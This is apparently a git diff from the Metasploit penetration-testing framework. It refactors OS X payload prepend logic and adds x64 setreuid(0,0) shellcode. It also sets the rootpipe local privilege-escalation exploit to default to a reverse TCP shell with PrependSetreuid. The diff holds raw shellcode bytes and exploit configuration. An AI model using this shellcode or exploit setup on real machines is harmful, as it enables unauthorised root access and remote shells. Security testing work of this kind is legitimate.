diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index aa91314e6b..a3431949f1 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -87,10 +87,6 @@ module Msf::Payload::Linux ret end - - # - # Overload the generate() call to prefix our stubs - # def apply_prepends(buf) pre = '' app = '' diff --git a/lib/msf/core/payload/osx.rb b/lib/msf/core/payload/osx.rb index 0eab13d568..60bd5edfd0 100644 --- a/lib/msf/core/payload/osx.rb +++ b/lib/msf/core/payload/osx.rb @@ -73,95 +73,126 @@ module Msf::Payload::Osx ret end - - # - # Overload the generate() call to prefix our stubs - # - def generate(*args) - # Call the real generator to get the payload - buf = super(*args) + def apply_prepends(buf) + test_arch = [ *(self.arch) ] pre = '' app = '' - test_arch = [ *(self.arch) ] - # Handle all x86 code here if (test_arch.include?(ARCH_X86)) - - # Prepend - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x66\xb8\x37\x01" +# movw $0x0137,%ax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetreuid']) - # setreuid(0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\x7e" +# movb $0x7e,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\x17" +# movb $0x17,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x66\xb8\x38\x01" +# movw $0x0138,%ax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetregid']) - # setregid(0, 0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\x7f" +# movb $0x7f,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\x50" +# pushl %eax # - "\xb0\xb5" +# movb $0xb5,%al # - "\xcd\x80" # int $0x80 # - end - # Append - - if (datastore['AppendExit']) - # exit(0) - app << "\x31\xc0" +# xorl %eax,%eax # - "\x50" +# pushl %eax # - "\xb0\x01" +# movb $0x01,%al # - "\xcd\x80" # int $0x80 # - end - + handle_x86_osx_opts(pre, app) + elsif (test_arch.include?(ARCH_X86_64)) + handle_x64_osx_opts(pre, app) end - return (pre + buf + app) + pre + buf + app + end + + def handle_x86_osx_opts(pre, app) + if (datastore['PrependSetresuid']) + # setresuid(0, 0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x66\xb8\x37\x01" +# movw $0x0137,%ax # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetreuid']) + # setreuid(0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\x7e" +# movb $0x7e,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetuid']) + # setuid(0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\x17" +# movb $0x17,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetresgid']) + # setresgid(0, 0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x66\xb8\x38\x01" +# movw $0x0138,%ax # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetregid']) + # setregid(0, 0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\x7f" +# movb $0x7f,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['PrependSetgid']) + # setgid(0) + pre << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\x50" +# pushl %eax # + "\xb0\xb5" +# movb $0xb5,%al # + "\xcd\x80" # int $0x80 # + end + + if (datastore['AppendExit']) + # exit(0) + app << "\x31\xc0" +# xorl %eax,%eax # + "\x50" +# pushl %eax # + "\xb0\x01" +# movb $0x01,%al # + "\xcd\x80" # int $0x80 # + end + end + + def handle_x64_osx_opts(pre, app) + if (datastore['PrependSetresuid']) + raise RuntimeError, "PrependSetresuid is not implemented" + end + + if (datastore['PrependSetreuid']) + # setreuid(0, 0) + pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24) + "\x49\xc1\xe0\x18" +# shl r8, 24 + "\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126) + "\x4c\x89\xc0" +# mov rax, r8 311 + "\x48\x31\xff" +# xor rdi, rdi 0 + "\x48\x31\xf6" +# xor rsi, rsi 0 + "\x0f\x05" # syscall + end + + if (datastore['PrependSetuid']) + raise RuntimeError, "PrependSetuid is not implemented" + end + + if (datastore['PrependSetresgid']) + raise RuntimeError, "PrependSetresgid is not implemented" + end + + if (datastore['PrependSetregid']) + raise RuntimeError, "PrependSetregid is not implemented" + end + + if (datastore['PrependSetgid']) + raise RuntimeError, "PrependSetgid is not implemented" + end + + if (datastore['AppendExit']) + raise RuntimeError, "AppendExit is not implemented" + end end diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index b5f6bfb0aa..63b6aa3d91 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -48,7 +48,7 @@ class Metasploit4 < Msf::Exploit::Local 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp', - 'CMD' => '/bin/zsh' + 'PrependSetreuid' => true } ))